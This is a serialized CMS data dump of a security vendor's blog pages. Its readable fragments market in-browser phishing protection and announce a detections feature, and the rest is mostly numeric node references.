layout",[],{},{"nodeType":254,"data":93211,"content":93212},{},[93213],{"nodeType":178,"data":93214,"content":93215},{},[93216],{"nodeType":173,"value":93217,"marks":93218,"data":93219},"Where the user came from",[],{},{"nodeType":254,"data":93221,"content":93222},{},[93223],{"nodeType":178,"data":93224,"content":93225},{},[93226,93229,93236],{"nodeType":173,"value":74365,"marks":93227,"data":93228},[],{},{"nodeType":186,"data":93230,"content":93231},{"uri":74370},[93232],{"nodeType":173,"value":74373,"marks":93233,"data":93235},[93234],{"type":194},{},{"nodeType":173,"value":37,"marks":93237,"data":93238},[],{},{"nodeType":254,"data":93240,"content":93241},{},[93242],{"nodeType":178,"data":93243,"content":93244},{},[93245],{"nodeType":173,"value":93246,"marks":93247,"data":93248},"What scripts are running",[],{},{"nodeType":254,"data":93250,"content":93251},{},[93252],{"nodeType":178,"data":93253,"content":93254},{},[93255],{"nodeType":173,"value":93256,"marks":93257,"data":93258},"And where credentials are being sent",[],{},{"nodeType":178,"data":93260,"content":93261},{},[93262],{"nodeType":173,"value":93263,"marks":93264,"data":93265},"This context enables Push to stop even well-camouflaged phishing attempts, including AitM attacks that bypass MFA.",[],{},{"nodeType":235,"data":93267,"content":93268},{},[93269],{"nodeType":173,"value":93270,"marks":93271,"data":93273},"Real-time interception of malicious activity",[93272],{"type":370},{},{"nodeType":178,"data":93275,"content":93276},{},[93277],{"nodeType":173,"value":93278,"marks":93279,"data":93280},"As soon as a phishing attempt is confirmed, the response is immediate:",[],{},{"nodeType":250,"data":93282,"content":93283},{},[93284,93294,93304],{"nodeType":254,"data":93285,"content":93286},{},[93287],{"nodeType":178,"data":93288,"content":93289},{},[93290],{"nodeType":173,"value":93291,"marks":93292,"data":93293},"Credential entry is halted.",[],{},{"nodeType":254,"data":93295,"content":93296},{},[93297],{"nodeType":178,"data":93298,"content":93299},{},[93300],{"nodeType":173,"value":93301,"marks":93302,"data":93303},"Sessions are revoked.",[],{},{"nodeType":254,"data":93305,"content":93306},{},[93307],{"nodeType":178,"data":93308,"content":93309},{},[93310],{"nodeType":173,"value":93311,"marks":93312,"data":93313},"The user is protected without delay.",[],{},{"nodeType":235,"data":93315,"content":93316},{},[93317],{"nodeType":173,"value":93318,"marks":93319,"data":93321},"Reduced incident response overhead",[93320],{"type":370},{},{"nodeType":178,"data":93323,"content":93324},{},[93325],{"nodeType":173,"value":93326,"marks":93327,"data":93328},"Most phishing attacks end in hours of IR and expensive cleanup. With Push, attacks don’t escalate beyond the initial click. That means fewer compromised accounts, fewer escalations, and less fatigue on your security team.",[],{},{"nodeType":235,"data":93330,"content":93331},{},[93332],{"nodeType":173,"value":93333,"marks":93334,"data":93336},"Empowered, educated users",[93335],{"type":370},{},{"nodeType":178,"data":93338,"content":93339},{},[93340],{"nodeType":173,"value":93341,"marks":93342,"data":93343},"Push doesn’t just block phishing; it helps users learn from it. When someone interacts with a suspicious page, they get clear, actionable feedback right in the browser. Over time, these in-the-moment cues help build stronger phishing awareness across your workforce. Employee-facing messages are fully customizable to match the tone and style of your organization.",[],{},{"nodeType":235,"data":93345,"content":93346},{},[93347],{"nodeType":173,"value":93348,"marks":93349,"data":93351},"A new paradigm for identity security",[93350],{"type":370},{},{"nodeType":178,"data":93353,"content":93354},{},[93355],{"nodeType":173,"value":93356,"marks":93357,"data":93358},"While phishing detection is core, Push also helps you defend your entire browser-based identity attack surface. That means protecting against other common forms of account compromise, like:",[],{},{"nodeType":250,"data":93360,"content":93361},{},[93362,93372,93382,93392,93402],{"nodeType":254,"data":93363,"content":93364},{},[93365],{"nodeType":178,"data":93366,"content":93367},{},[93368],{"nodeType":173,"value":93369,"marks":93370,"data":93371},"Employees using breached or reused passwords",[],{},{"nodeType":254,"data":93373,"content":93374},{},[93375],{"nodeType":178,"data":93376,"content":93377},{},[93378],{"nodeType":173,"value":93379,"marks":93380,"data":93381},"Missing or misconfigured MFA",[],{},{"nodeType":254,"data":93383,"content":93384},{},[93385],{"nodeType":178,"data":93386,"content":93387},{},[93388],{"nodeType":173,"value":93389,"marks":93390,"data":93391},"Ghost logins that bypass your identity provider",[],{},{"nodeType":254,"data":93393,"content":93394},{},[93395],{"nodeType":178,"data":93396,"content":93397},{},[93398],{"nodeType":173,"value":93399,"marks":93400,"data":93401},"Token-based session hijacking",[],{},{"nodeType":254,"data":93403,"content":93404},{},[93405],{"nodeType":178,"data":93406,"content":93407},{},[93408],{"nodeType":173,"value":93409,"marks":93410,"data":93411},"Shadow SaaS usage",[],{},{"nodeType":178,"data":93413,"content":93414},{},[93415],{"nodeType":173,"value":93416,"marks":93417,"data":93418},"Because Push runs directly in the browser, it gives you visibility across every app your employees access, whether it’s officially managed or not. And it doesn’t just alert, it actively helps you fix the issues, guiding users to take action when risks are found.",[],{},{"nodeType":231,"data":93420,"content":93421},{},[],{"nodeType":169,"data":93423,"content":93424},{},[93425],{"nodeType":173,"value":93426,"marks":93427,"data":93429},"Modern phishing requires a modern defense",[93428],{"type":370},{},{"nodeType":178,"data":93431,"content":93432},{},[93433],{"nodeType":173,"value":93434,"marks":93435,"data":93436},"Phishing is no longer an email problem. It’s not even just a domain reputation problem. It’s an identity attack problem, and the only place you can see those attacks in action is inside the browser.",[],{},{"nodeType":178,"data":93438,"content":93439},{},[93440,93444,93451],{"nodeType":173,"value":93441,"marks":93442,"data":93443},"Push Security gives you a new advantage: proactive, in-browser protection against modern phishing campaigns — ",[],{},{"nodeType":186,"data":93445,"content":93446},{"uri":92943},[93447],{"nodeType":173,"value":93448,"marks":93449,"data":93450},"even those with never-before-seen phishing sites",[],{},{"nodeType":173,"value":1477,"marks":93452,"data":93453},[],{},{"nodeType":250,"data":93455,"content":93456},{},[93457,93467,93477],{"nodeType":254,"data":93458,"content":93459},{},[93460],{"nodeType":178,"data":93461,"content":93462},{},[93463],{"nodeType":173,"value":93464,"marks":93465,"data":93466},"See the phish happen.",[],{},{"nodeType":254,"data":93468,"content":93469},{},[93470],{"nodeType":178,"data":93471,"content":93472},{},[93473],{"nodeType":173,"value":93474,"marks":93475,"data":93476},"Stop it in real time.",[],{},{"nodeType":254,"data":93478,"content":93479},{},[93480],{"nodeType":178,"data":93481,"content":93482},{},[93483],{"nodeType":173,"value":93484,"marks":93485,"data":93486},"Keep your workforce identities safe.",[],{},{"nodeType":178,"data":93488,"content":93489},{},[93490,93495,93503],{"nodeType":173,"value":93491,"marks":93492,"data":93494},"Want to see Push in action? ",[93493],{"type":370},{},{"nodeType":186,"data":93496,"content":93497},{"uri":473},[93498],{"nodeType":173,"value":93499,"marks":93500,"data":93502},"Book a demo",[93501],{"type":370},{},{"nodeType":173,"value":93504,"marks":93505,"data":93507}," and watch a real-time phishing attack get stopped mid-flow.",[93506],{"type":370},{},{"nodeType":312,"data":93509,"content":93513},{"target":93510},{"sys":93511},{"id":93512,"type":317,"linkType":318},"7eSsPjEj178j3ViloaChbQ",[],{"nodeType":178,"data":93515,"content":93516},{},[93517],{"nodeType":173,"value":37,"marks":93518,"data":93519},[],{},"How browser-level controls change the fight against phishing","Attackers are routinely defeating conventional email, network, and endpoint-based security controls. Here's how browser controls can level the playing field.","2025-06-26T00:00:00.000Z","how-browser-level-controls-change-the-fight-against-phishing",{"items":93525},[93526,93528],{"sys":93527,"name":505},{"id":504},{"sys":93529,"name":509},{"id":508},{"items":93531},[93532],{"fullName":25594,"firstName":25595,"jobTitle":514,"profilePicture":93533},{"url":25597},{"items":93535},[93536],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":93537},{"url":13981},{"json":93539,"links":94009},{"data":93540,"content":93541,"nodeType":165},{},[93542,93558,93564,93585,93591,93597,93603,93619,93624,93627,93634,93640,93656,93692,93728,93754,93770,93775,93778,93785,93791,93797,93803,93809,93916,93922,93925,93932,93948,93963,93966,93973,93988,93994],{"data":93543,"content":93544,"nodeType":178},{},[93545,93548,93555],{"data":93546,"marks":93547,"value":88236,"nodeType":173},{},[],{"data":93549,"content":93550,"nodeType":186},{"uri":88239},[93551],{"data":93552,"marks":93553,"value":88245,"nodeType":173},{},[93554],{"type":194},{"data":93556,"marks":93557,"value":88249,"nodeType":173},{},[],{"data":93559,"content":93560,"nodeType":178},{},[93561],{"data":93562,"marks":93563,"value":88256,"nodeType":173},{},[],{"data":93565,"content":93566,"nodeType":250},{},[93567,93576],{"data":93568,"content":93569,"nodeType":254},{},[93570],{"data":93571,"content":93572,"nodeType":178},{},[93573],{"data":93574,"marks":93575,"value":88269,"nodeType":173},{},[],{"data":93577,"content":93578,"nodeType":254},{},[93579],{"data":93580,"content":93581,"nodeType":178},{},[93582],{"data":93583,"marks":93584,"value":88279,"nodeType":173},{},[],{"data":93586,"content":93587,"nodeType":178},{},[93588],{"data":93589,"marks":93590,"value":88286,"nodeType":173},{},[],{"data":93592,"content":93593,"nodeType":178},{},[93594],{"data":93595,"marks":93596,"value":88293,"nodeType":173},{},[],{"data":93598,"content":93599,"nodeType":178},{},[93600],{"data":93601,"marks":93602,"value":88300,"nodeType":173},{},[],{"data":93604,"content":93605,"nodeType":178},{},[93606,93609,93616],{"data":93607,"marks":93608,"value":88307,"nodeType":173},{},[],{"data":93610,"content":93611,"nodeType":186},{"uri":24215},[93612],{"data":93613,"marks":93614,"value":88315,"nodeType":173},{},[93615],{"type":194},{"data":93617,"marks":93618,"value":88319,"nodeType":173},{},[],{"data":93620,"content":93623,"nodeType":312},{"target":93621},{"sys":93622},{"id":88324,"type":317,"linkType":318},[],{"data":93625,"content":93626,"nodeType":231},{},[],{"data":93628,"content":93629,"nodeType":169},{},[93630],{"data":93631,"marks":93632,"value":88336,"nodeType":173},{},[93633],{"type":370},{"data":93635,"content":93636,"nodeType":178},{},[93637],{"data":93638,"marks":93639,"value":88343,"nodeType":173},{},[],{"data":93641,"content":93642,"nodeType":178},{},[93643,93646,93653],{"data":93644,"marks":93645,"value":88350,"nodeType":173},{},[],{"data":93647,"content":93648,"nodeType":186},{"uri":88353},[93649],{"data":93650,"marks":93651,"value":88359,"nodeType":173},{},[93652],{"type":194},{"data":93654,"marks":93655,"value":88363,"nodeType":173},{},[],{"data":93657,"content":93658,"nodeType":178},{},[93659,93662,93669,93672,93679,93682,93689],{"data":93660,"marks":93661,"value":88370,"nodeType":173},{},[],{"data":93663,"content":93664,"nodeType":186},{"uri":62896},[93665],{"data":93666,"marks":93667,"value":88378,"nodeType":173},{},[93668],{"type":194},{"data":93670,"marks":93671,"value":88382,"nodeType":173},{},[],{"data":93673,"content":93674,"nodeType":186},{"uri":50026},[93675],{"data":93676,"marks":93677,"value":88390,"nodeType":173},{},[93678],{"type":194},{"data":93680,"marks":93681,"value":88394,"nodeType":173},{},[],{"data":93683,"content":93684,"nodeType":186},{"uri":42062},[93685],{"data":93686,"marks":93687,"value":88402,"nodeType":173},{},[93688],{"type":194},{"data":93690,"marks":93691,"value":88406,"nodeType":173},{},[],{"data":93693,"content":93694,"nodeType":178},{},[93695,93698,93705,93708,93715,93718,93725],{"data":93696,"marks":93697,"value":88413,"nodeType":173},{},[],{"data":93699,"content":93700,"nodeType":186},{"uri":8043},[93701],{"data":93702,"marks":93703,"value":8046,"nodeType":173},{},[93704],{"type":194},{"data":93706,"marks":93707,"value":88424,"nodeType":173},{},[],{"data":93709,"content":93710,"nodeType":186},{"uri":88427},[93711],{"data":93712,"marks":93713,"value":88433,"nodeType":173},{},[93714],{"type":194},{"data":93716,"marks":93717,"value":88437,"nodeType":173},{},[],{"data":93719,"content":93720,"nodeType":186},{"uri":58195},[93721],{"data":93722,"marks":93723,"value":88445,"nodeType":173},{},[93724],{"type":194},{"data":93726,"marks":93727,"value":88449,"nodeType":173},{},[],{"data":93729,"content":93730,"nodeType":178},{},[93731,93734,93741,93744,93751],{"data":93732,"marks":93733,"value":88456,"nodeType":173},{},[],{"data":93735,"content":93736,"nodeType":186},{"uri":88459},[93737],{"data":93738,"marks":93739,"value":88465,"nodeType":173},{},[93740],{"type":194},{"data":93742,"marks":93743,"value":88469,"nodeType":173},{},[],{"data":93745,"content":93746,"nodeType":186},{"uri":8088},[93747],{"data":93748,"marks":93749,"value":8091,"nodeType":173},{},[93750],{"type":194},{"data":93752,"marks":93753,"value":197,"nodeType":173},{},[],{"data":93755,"content":93756,"nodeType":178},{},[93757,93760,93767],{"data":93758,"marks":93759,"value":88486,"nodeType":173},{},[],{"data":93761,"content":93762,"nodeType":186},{"uri":88489},[93763],{"data":93764,"marks":93765,"value":88495,"nodeType":173},{},[93766],{"type":194},{"data":93768,"marks":93769,"value":88499,"nodeType":173},{},[],{"data":93771,"content":93774,"nodeType":312},{"target":93772},{"sys":93773},{"id":60266,"type":317,"linkType":318},[],{"data":93776,"content":93777,"nodeType":231},{},[],{"data":93779,"content":93780,"nodeType":169},{},[93781],{"data":93782,"marks":93783,"value":88515,"nodeType":173},{},[93784],{"type":370},{"data":93786,"content":93787,"nodeType":178},{},[93788],{"data":93789,"marks":93790,"value":88522,"nodeType":173},{},[],{"data":93792,"content":93793,"nodeType":178},{},[93794],{"data":93795,"marks":93796,"value":88529,"nodeType":173},{},[],{"data":93798,"content":93799,"nodeType":178},{},[93800],{"data":93801,"marks":93802,"value":88536,"nodeType":173},{},[],{"data":93804,"content":93805,"nodeType":178},{},[93806],{"data":93807,"marks":93808,"value":88543,"nodeType":173},{},[],{"data":93810,"content":93811,"nodeType":250},{},[93812,93825,93838,93851,93864,93877,93890,93903],{"data":93813,"content":93814,"nodeType":254},{},[93815],{"data":93816,"content":93817,"nodeType":178},{},[93818,93822],{"data":93819,"marks":93820,"value":88557,"nodeType":173},{},[93821],{"type":370},{"data":93823,"marks":93824,"value":88561,"nodeType":173},{},[],{"data":93826,"content":93827,"nodeType":254},{},[93828],{"data":93829,"content":93830,"nodeType":178},{},[93831,93835],{"data":93832,"marks":93833,"value":88572,"nodeType":173},{},[93834],{"type":370},{"data":93836,"marks":93837,"value":88576,"nodeType":173},{},[],{"data":93839,"content":93840,"nodeType":254},{},[93841],{"data":93842,"content":93843,"nodeType":178},{},[93844,93848],{"data":93845,"marks":93846,"value":88587,"nodeType":173},{},[93847],{"type":370},{"data":93849,"marks":93850,"value":88591,"nodeType":173},{},[],{"data":93852,"content":93853,"nodeType":254},{},[93854],{"data":93855,"content":93856,"nodeType":178},{},[93857,93861],{"data":93858,"marks":93859,"value":88602,"nodeType":173},{},[93860],{"type":370},{"data":93862,"marks":93863,"value":88606,"nodeType":173},{},[],{"data":93865,"content":93866,"nodeType":254},{},[93867],{"data":93868,"content":93869,"nodeType":178},{},[93870,93874],{"data":93871,"marks":93872,"value":88617,"nodeType":173},{},[93873],{"type":370},{"data":93875,"marks":93876,"value":88621,"nodeType":173},{},[],{"data":93878,"content":93879,"nodeType":254},{},[93880],{"data":93881,"content":93882,"nodeType":178},{},[93883,93887],{"data":93884,"marks":93885,"value":88632,"nodeType":173},{},[93886],{"type":370},{"data":93888,"marks":93889,"value":88636,"nodeType":173},{},[],{"data":93891,"content":93892,"nodeType":254},{},[93893],{"data":93894,"content":93895,"nodeType":178},{},[93896,93900],{"data":93897,"marks":93898,"value":88647,"nodeType":173},{},[93899],{"type":370},{"data":93901,"marks":93902,"value":88651,"nodeType":173},{},[],{"data":93904,"content":93905,"nodeType":254},{},[93906],{"data":93907,"content":93908,"nodeType":178},{},[93909,93913],{"data":93910,"marks":93911,"value":88662,"nodeType":173},{},[93912],{"type":370},{"data":93914,"marks":93915,"value":88666,"nodeType":173},{},[],{"data":93917,"content":93918,"nodeType":178},{},[93919],{"data":93920,"marks":93921,"value":88673,"nodeType":173},{},[],{"data":93923,"content":93924,"nodeType":231},{},[],{"data":93926,"content":93927,"nodeType":169},{},[93928],{"data":93929,"marks":93930,"value":18605,"nodeType":173},{},[93931],{"type":370},{"data":93933,"content":93934,"nodeType":178},{},[93935,93938,93945],{"data":93936,"marks":93937,"value":37,"nodeType":173},{},[],{"data":93939,"content":93940,"nodeType":186},{"uri":24215},[93941],{"data":93942,"marks":93943,"value":88697,"nodeType":173},{},[93944],{"type":194},{"data":93946,"marks":93947,"value":37,"nodeType":173},{},[],{"data":93949,"content":93950,"nodeType":178},{},[93951,93954,93960],{"data":93952,"marks":93953,"value":88707,"nodeType":173},{},[],{"data":93955,"content":93956,"nodeType":186},{"uri":70840},[93957],{"data":93958,"marks":93959,"value":88714,"nodeType":173},{},[],{"data":93961,"marks":93962,"value":37,"nodeType":173},{},[],{"data":93964,"content":93965,"nodeType":231},{},[],{"data":93967,"content":93968,"nodeType":169},{},[93969],{"data":93970,"marks":93971,"value":88728,"nodeType":173},{},[93972],{"type":370},{"data":93974,"content":93975,"nodeType":178},{},[93976,93979,93985],{"data":93977,"marks":93978,"value":88735,"nodeType":173},{},[],{"data":93980,"content":93981,"nodeType":186},{"uri":88239},[93982],{"data":93983,"marks":93984,"value":88742,"nodeType":173},{},[],{"data":93986,"marks":93987,"value":88746,"nodeType":173},{},[],{"data":93989,"content":93990,"nodeType":178},{},[93991],{"data":93992,"marks":93993,"value":88753,"nodeType":173},{},[],{"data":93995,"content":93996,"nodeType":178},{},[93997,94000,94006],{"data":93998,"marks":93999,"value":88760,"nodeType":173},{},[],{"data":94001,"content":94002,"nodeType":186},{"uri":88763},[94003],{"data":94004,"marks":94005,"value":88768,"nodeType":173},{},[],{"data":94007,"marks":94008,"value":37,"nodeType":173},{},[],{"entries":94010},{"hyperlink":94011,"inline":94012,"block":94013},[],[],[94014,94021],{"sys":94015,"__typename":5345,"title":94016,"caption":118,"layoutMode":118,"file":94017},{"id":88324},"Phishing evasion techniques matrix",{"url":94018,"width":94019,"height":94020},"https://images.ctfassets.net/y1cdw1ablpvd/2cWkqvkdur2bE8wcXDBp5k/a0dce8da8d4210b845da30e4653119d3/Group_543__1_.png",2224,1401,{"sys":94022,"__typename":15269,"type":15270,"ctaText":80152,"buttonLabel":80153,"buttonColour":15273,"buttonUrl":70840},{"id":60266},"content:blog:phishing-detection-evasion-launch.json","blog/phishing-detection-evasion-launch.json","blog/phishing-detection-evasion-launch",{"_path":94027,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":94028,"ogImage":118,"summary":94030,"title":46296,"subtitle":118,"metaTitle":94041,"synopsis":82273,"hashTags":118,"publishedDate":82274,"slug":46297,"tagsCollection":94042,"relatedBlogPostsCollection":94048,"authorsCollection":95493,"content":95497,"_id":96438,"_type":5439,"_source":5440,"_file":96439,"_stem":96440,"_extension":5439},"/blog/introducing-push-detections",{"id":24428,"publishedAt":94029},"2025-07-30T06:54:28.491Z",{"json":94031},{"data":94032,"content":94033,"nodeType":165},{},[94034],{"data":94035,"content":94036,"nodeType":178},{},[94037],{"data":94038,"marks":94039,"value":94040,"nodeType":173},{},[],"We’re launching a new Detections capability to provide deeper context and fine-grained data points on attacks that Push intercepts in the browser — enabling security teams to more effectively investigate and triage alerts, and build more effective workflows. ","Introducing Push Detections: Equipping SecOps and IR teams",{"items":94043},[94044,94046],{"sys":94045,"name":509},{"id":508},{"sys":94047,"name":505},{"id":504},{"items":94049},[94050,94603,94908],{"__typename":1528,"sys":94051,"content":94052,"title":93520,"synopsis":93521,"hashTags":118,"publishedDate":93522,"slug":93523,"tagsCollection":94593,"authorsCollection":94599},{"id":92907},{"json":94053},{"nodeType":165,"data":94054,"content":94055},{},[94056,94062,94068,94075,94098,94104,94109,94112,94119,94125,94131,94170,94176,94182,94185,94192,94198,94204,94210,94226,94232,94237,94244,94250,94256,94262,94267,94270,94277,94284,94290,94297,94303,94361,94367,94374,94380,94410,94417,94423,94430,94436,94443,94449,94497,94503,94506,94513,94519,94534,94564,94582,94587],{"nodeType":178,"data":94057,"content":94058},{},[94059],{"nodeType":173,"value":92916,"marks":94060,"data":94061},[],{},{"nodeType":178,"data":94063,"content":94064},{},[94065],{"nodeType":173,"value":92923,"marks":94066,"data":94067},[],{},{"nodeType":178,"data":94069,"content":94070},{},[94071],{"nodeType":173,"value":92930,"marks":94072,"data":94074},[94073],{"type":370},{},{"nodeType":178,"data":94076,"content":94077},{},[94078,94081,94088,94091,94095],{"nodeType":173,"value":92938,"marks":94079,"data":94080},[],{},{"nodeType":186,"data":94082,"content":94083},{"uri":92943},[94084],{"nodeType":173,"value":92946,"marks":94085,"data":94087},[94086],{"type":194},{},{"nodeType":173,"value":92951,"marks":94089,"data":94090},[],{},{"nodeType":173,"value":92955,"marks":94092,"data":94094},[94093],{"type":1646},{},{"nodeType":173,"value":92960,"marks":94096,"data":94097},[],{},{"nodeType":178,"data":94099,"content":94100},{},[94101],{"nodeType":173,"value":92967,"marks":94102,"data":94103},[],{},{"nodeType":312,"data":94105,"content":94108},{"target":94106},{"sys":94107},{"id":92974,"type":317,"linkType":318},[],{"nodeType":231,"data":94110,"content":94111},{},[],{"nodeType":169,"data":94113,"content":94114},{},[94115],{"nodeType":173,"value":92983,"marks":94116,"data":94118},[94117],{"type":370},{},{"nodeType":178,"data":94120,"content":94121},{},[94122],{"nodeType":173,"value":92991,"marks":94123,"data":94124},[],{},{"nodeType":178,"data":94126,"content":94127},{},[94128],{"nodeType":173,"value":92998,"marks":94129,"data":94130},[],{},{"nodeType":250,"data":94132,"content":94133},{},[94134,94143,94152,94161],{"nodeType":254,"data":94135,"content":94136},{},[94137],{"nodeType":178,"data":94138,"content":94139},{},[94140],{"nodeType":173,"value":93011,"marks":94141,"data":94142},[],{},{"nodeType":254,"data":94144,"content":94145},{},[94146],{"nodeType":178,"data":94147,"content":94148},{},[94149],{"nodeType":173,"value":93021,"marks":94150,"data":94151},[],{},{"nodeType":254,"data":94153,"content":94154},{},[94155],{"nodeType":178,"data":94156,"content":94157},{},[94158],{"nodeType":173,"value":93031,"marks":94159,"data":94160},[],{},{"nodeType":254,"data":94162,"content":94163},{},[94164],{"nodeType":178,"data":94165,"content":94166},{},[94167],{"nodeType":173,"value":93041,"marks":94168,"data":94169},[],{},{"nodeType":178,"data":94171,"content":94172},{},[94173],{"nodeType":173,"value":93048,"marks":94174,"data":94175},[],{},{"nodeType":178,"data":94177,"content":94178},{},[94179],{"nodeType":173,"value":93055,"marks":94180,"data":94181},[],{},{"nodeType":231,"data":94183,"content":94184},{},[],{"nodeType":169,"data":94186,"content":94187},{},[94188],{"nodeType":173,"value":93065,"marks":94189,"data":94191},[94190],{"type":370},{},{"nodeType":178,"data":94193,"content":94194},{},[94195],{"nodeType":173,"value":93073,"marks":94196,"data":94197},[],{},{"nodeType":178,"data":94199,"content":94200},{},[94201],{"nodeType":173,"value":93080,"marks":94202,"data":94203},[],{},{"nodeType":178,"data":94205,"content":94206},{},[94207],{"nodeType":173,"value":93087,"marks":94208,"data":94209},[],{},{"nodeType":178,"data":94211,"content":94212},{},[94213,94216,94223],{"nodeType":173,"value":93094,"marks":94214,"data":94215},[],{},{"nodeType":186,"data":94217,"content":94218},{"uri":27726},[94219],{"nodeType":173,"value":27729,"marks":94220,"data":94222},[94221],{"type":194},{},{"nodeType":173,"value":93105,"marks":94224,"data":94225},[],{},{"nodeType":178,"data":94227,"content":94228},{},[94229],{"nodeType":173,"value":93112,"marks":94230,"data":94231},[],{},{"nodeType":312,"data":94233,"content":94236},{"target":94234},{"sys":94235},{"id":93119,"type":317,"linkType":318},[],{"nodeType":169,"data":94238,"content":94239},{},[94240],{"nodeType":173,"value":93125,"marks":94241,"data":94243},[94242],{"type":370},{},{"nodeType":178,"data":94245,"content":94246},{},[94247],{"nodeType":173,"value":93133,"marks":94248,"data":94249},[],{},{"nodeType":178,"data":94251,"content":94252},{},[94253],{"nodeType":173,"value":93140,"marks":94254,"data":94255},[],{},{"nodeType":178,"data":94257,"content":94258},{},[94259],{"nodeType":173,"value":93147,"marks":94260,"data":94261},[],{},{"nodeType":312,"data":94263,"content":94266},{"target":94264},{"sys":94265},{"id":93154,"type":317,"linkType":318},[],{"nodeType":231,"data":94268,"content":94269},{},[],{"nodeType":169,"data":94271,"content":94272},{},[94273],{"nodeType":173,"value":93163,"marks":94274,"data":94276},[94275],{"type":370},{},{"nodeType":235,"data":94278,"content":94279},{},[94280],{"nodeType":173,"value":93171,"marks":94281,"data":94283},[94282],{"type":370},{},{"nodeType":178,"data":94285,"content":94286},{},[94287],{"nodeType":173,"value":93179,"marks":94288,"data":94289},[],{},{"nodeType":235,"data":94291,"content":94292},{},[94293],{"nodeType":173,"value":93186,"marks":94294,"data":94296},[94295],{"type":370},{},{"nodeType":178,"data":94298,"content":94299},{},[94300],{"nodeType":173,"value":93194,"marks":94301,"data":94302},[],{},{"nodeType":250,"data":94304,"content":94305},{},[94306,94315,94324,94343,94352],{"nodeType":254,"data":94307,"content":94308},{},[94309],{"nodeType":178,"data":94310,"content":94311},{},[94312],{"nodeType":173,"value":93207,"marks":94313,"data":94314},[],{},{"nodeType":254,"data":94316,"content":94317},{},[94318],{"nodeType":178,"data":94319,"content":94320},{},[94321],{"nodeType":173,"value":93217,"marks":94322,"data":94323},[],{},{"nodeType":254,"data":94325,"content":94326},{},[94327],{"nodeType":178,"data":94328,"content":94329},{},[94330,94333,94340],{"nodeType":173,"value":74365,"marks":94331,"data":94332},[],{},{"nodeType":186,"data":94334,"content":94335},{"uri":74370},[94336],{"nodeType":173,"value":74373,"marks":94337,"data":94339},[94338],{"type":194},{},{"nodeType":173,"value":37,"marks":94341,"data":94342},[],{},{"nodeType":254,"data":94344,"content":94345},{},[94346],{"nodeType":178,"data":94347,"content":94348},{},[94349],{"nodeType":173,"value":93246,"marks":94350,"data":94351},[],{},{"nodeType":254,"data":94353,"content":94354},{},[94355],{"nodeType":178,"data":94356,"content":94357},{},[94358],{"nodeType":173,"value":93256,"marks":94359,"data":94360},[],{},{"nodeType":178,"data":94362,"content":94363},{},[94364],{"nodeType":173,"value":93263,"marks":94365,"data":94366},[],{},{"nodeType":235,"data":94368,"content":94369},{},[94370],{"nodeType":173,"value":93270,"marks":94371,"data":94373},[94372],{"type":370},{},{"nodeType":178,"data":94375,"content":94376},{},[94377],{"nodeType":173,"value":93278,"marks":94378,"data":94379},[],{},{"nodeType":250,"data":94381,"content":94382},{},[94383,94392,94401],{"nodeType":254,"data":94384,"content":94385},{},[94386],{"nodeType":178,"data":94387,"content":94388},{},[94389],{"nodeType":173,"value":93291,"marks":94390,"data":94391},[],{},{"nodeType":254,"data":94393,"content":94394},{},[94395],{"nodeType":178,"data":94396,"content":94397},{},[94398],{"nodeType":173,"value":93301,"marks":94399,"data":94400},[],{},{"nodeType":254,"data":94402,"content":94403},{},[94404],{"nodeType":178,"data":94405,"content":94406},{},[94407],{"nodeType":173,"value":93311,"marks":94408,"data":94409},[],{},{"nodeType":235,"data":94411,"content":94412},{},[94413],{"nodeType":173,"value":93318,"marks":94414,"data":94416},[94415],{"type":370},{},{"nodeType":178,"data":94418,"content":94419},{},[94420],{"nodeType":173,"value":93326,"marks":94421,"data":94422},[],{},{"nodeType":235,"data":94424,"content":94425},{},[94426],{"nodeType":173,"value":93333,"marks":94427,"data":94429},[94428],{"type":370},{},{"nodeType":178,"data":94431,"content":94432},{},[94433],{"nodeType":173,"value":93341,"marks":94434,"data":94435},[],{},{"nodeType":235,"data":94437,"content":94438},{},[94439],{"nodeType":173,"value":93348,"marks":94440,"data":94442},[94441],{"type":370},{},{"nodeType":178,"data":94444,"content":94445},{},[94446],{"nodeType":173,"value":93356,"marks":94447,"data":94448},[],{},{"nodeType":250,"data":94450,"content":94451},{},[94452,94461,94470,94479,94488],{"nodeType":254,"data":94453,"content":94454},{},[94455],{"nodeType":178,"data":94456,"content":94457},{},[94458],{"nodeType":173,"value":93369,"marks":94459,"data":94460},[],{},{"nodeType":254,"data":94462,"content":94463},{},[94464],{"nodeType":178,"data":94465,"content":94466},{},[94467],{"nodeType":173,"value":93379,"marks":94468,"data":94469},[],{},{"nodeType":254,"data":94471,"content":94472},{},[94473],{"nodeType":178,"data":94474,"content":94475},{},[94476],{"nodeType":173,"value":93389,"marks":94477,"data":94478},[],{},{"nodeType":254,"data":94480,"content":94481},{},[94482],{"nodeType":178,"data":94483,"content":94484},{},[94485],{"nodeType":173,"value":93399,"marks":94486,"data":94487},[],{},{"nodeType":254,"data":94489,"content":94490},{},[94491],{"nodeType":178,"data":94492,"content":94493},{},[94494],{"nodeType":173,"value":93409,"marks":94495,"data":94496},[],{},{"nodeType":178,"data":94498,"content":94499},{},[94500],{"nodeType":173,"value":93416,"marks":94501,"data":94502},[],{},{"nodeType":231,"data":94504,"content":94505},{},[],{"nodeType":169,"data":94507,"content":94508},{},[94509],{"nodeType":173,"value":93426,"marks":94510,"data":94512},[94511],{"type":370},{},{"nodeType":178,"data":94514,"content":94515},{},[94516],{"nodeType":173,"value":93434,"marks":94517,"data":94518},[],{},{"nodeType":178,"data":94520,"content":94521},{},[94522,94525,94531],{"nodeType":173,"value":93441,"marks":94523,"data":94524},[],{},{"nodeType":186,"data":94526,"content":94527},{"uri":92943},[94528],{"nodeType":173,"value":93448,"marks":94529,"data":94530},[],{},{"nodeType":173,"value":1477,"marks":94532,"data":94533},[],{},{"nodeType":250,"data":94535,"content":94536},{},[94537,94546,94555],{"nodeType":254,"data":94538,"content":94539},{},[94540],{"nodeType":178,"data":94541,"content":94542},{},[94543],{"nodeType":173,"value":93464,"marks":94544,"data":94545},[],{},{"nodeType":254,"data":94547,"content":94548},{},[94549],{"nodeType":178,"data":94550,"content":94551},{},[94552],{"nodeType":173,"value":93474,"marks":94553,"data":94554},[],{},{"nodeType":254,"data":94556,"content":94557},{},[94558],{"nodeType":178,"data":94559,"content":94560},{},[94561],{"nodeType":173,"value":93484,"marks":94562,"data":94563},[],{},{"nodeType":178,"data":94565,"content":94566},{},[94567,94571,94578],{"nodeType":173,"value":93491,"marks":94568,"data":94570},[94569],{"type":370},{},{"nodeType":186,"data":94572,"content":94573},{"